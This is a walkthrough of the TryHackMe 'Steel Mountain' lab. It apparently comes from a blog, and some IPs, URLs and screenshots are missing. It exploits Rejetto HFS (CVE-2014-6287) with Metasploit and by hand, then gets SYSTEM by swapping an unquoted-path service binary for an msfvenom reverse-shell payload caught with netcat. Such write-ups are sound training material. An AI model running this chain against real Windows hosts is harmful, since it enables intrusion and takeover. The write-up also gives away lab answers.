TryHackMe Writeup: Steel Mountain

6 min readJan 31, 2021


TryHackMe Writeup: Steel Mountain

First, we start off with simple enumeration

nmap -sC -sV -Pn

Now, since we know nmap scans can take a bit, we can discern that we have a little extra time to do some manual enumeration. With that said, let’s see if this server is set up as a webserver and check common web ports 80, 8080 and 443

Port 80 looks like a standard web site

Port 8080 appears to be a file server

Now in the first screenshot (port 80), we see an “Employee of the month”. This is also the first question that appears on TryHackMe. Since there doesn’t appear to be any information other than the photo on the site, lets check the page source to see if the image is named after this mysterious person

Hmmmm… could it be Bill Harper? Yes, yes it is!

The second question is asking what other port a web server is running on. Our quick pre-nmap check showed port 8080 was running a file server. So we will enter 8080.

The next question is asking what file server is running. A quick glance at the page shows “HTTPFileServer 2.3”.

Since that clearly isn’t the answer, we click the highlighted link at the bottom and it takes us to a “rejetto http file server” site.

Let’s input that answer and move on.

Now before we go any further, let’s check the results of the nmap scan we launched earlier

It appears that SMB and RDP are also open. This might come in handy later! But for now, let’s go ahead and fire up Metasploit. We are gonna do a quick check and see if there’s a module for the file server.


Ok, lets go ahead and configure and run this, since it seems promising and appears to match the software that is running.



set RPORT 8080

set LPORT 4444

Bombs away!

Annnnnnddddd BOOOMM!!

Looks like we have a low privileged shell under “Bill’s” UID

So we should have enough info to complete the next two questions. The CVE is CVE-2014–6287. We got this by typing the following into MSF:

info exploit/windows/http/rejetto_hfs_exec

The next question asks what the user flag is. So we will navigate through Bills user folders and try to locate the file

cd C:\Users\bill\*

We find a user.txt file on Bill’s Desktop. So we read it and discover the following:

Let’s enter that info as a flag and move on.

The next task is asking us to download a set of powershell scripts, and upload the “exploit” to the target machine. So after downloading, I loaded meterpreters “powershell” script, uploaded and ran the PowerUp file.

We will now load the powershell shell and run the script


. .\PowerUp.ps1


The next question asks what service shows up as an unquoted service path vulnerability and also has CanRestart set to True. Looks like it’s the AdvancedSystemCareService9 service

The next part is kind of tricky. The TryHackMe tutorial says to create a payload using msfvenom to replace the binary and name it “Advanced.exe”. This won’t work, as the name of the actual binary is ASCService.exe. So we will use that as the name instead

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4443 -f exe -o ASCService.exe

Now set up a netcat listener to “catch” the shell

nc -nvlp 4443

Next, we will go into our current meterpreter session, drop into a shell and stop the current service

Then we will upload our malicious file and restart the service

Uh oh, that error doesn’t look good…. Let’s check out netcat listener

Phew, we’re good! Now lets read the root flag


Task 4

So at this point, I had walked away for a minute, only to return to an expired machine. So with the rest of the walk through, the IP address of the target will now be

For this task, it is essentially asking you to do the same thing, sans Metasploit. We begin by exploiting the same CVE, but using an exploit given by TryHackMe

In addition to downloading that, we also need a netcat binary found here:

We also need a webserver to serve up the file. If you have apache installed, you can use that. I however will be using pythons SimpleHTTPServer. Open one terminal window, navigate to the ncat file you downloaded, rename it to nc.exe and start the server.

python3 -m http.server 80

Next, set up a listener in a separate window

nc -nvlp 1337

Modify the exploit to include your IP and port your listener is listening in on

Now run the exploit at least twice. If successful, you should now have a shell!

Now, since we are going to use WinPeas to enumerate the system, lets go ahead and move that webserver we started to the directory where winpeas is stored

cd /root/Desktop/tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x86/Release

python3 -m http.server 80

Now on the target shell we spawned, run:

powershell -c wget “" -outfile “winpeas.exe”

Once ran, we should see that we have Write/Create perms on the same service area that we exploited earlier

C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe

We can generate a new msfvenom payload, or use the one created previously to run on port 4443. I will use that one.

First, let’s create a netcat listener to catch our shell

nc -nvlp 4443

Starting on bills desktop, we are going to upload our payload

Now stop the current service

And copy and overwrite the current service with our payload and restart the service

We should now have r00t!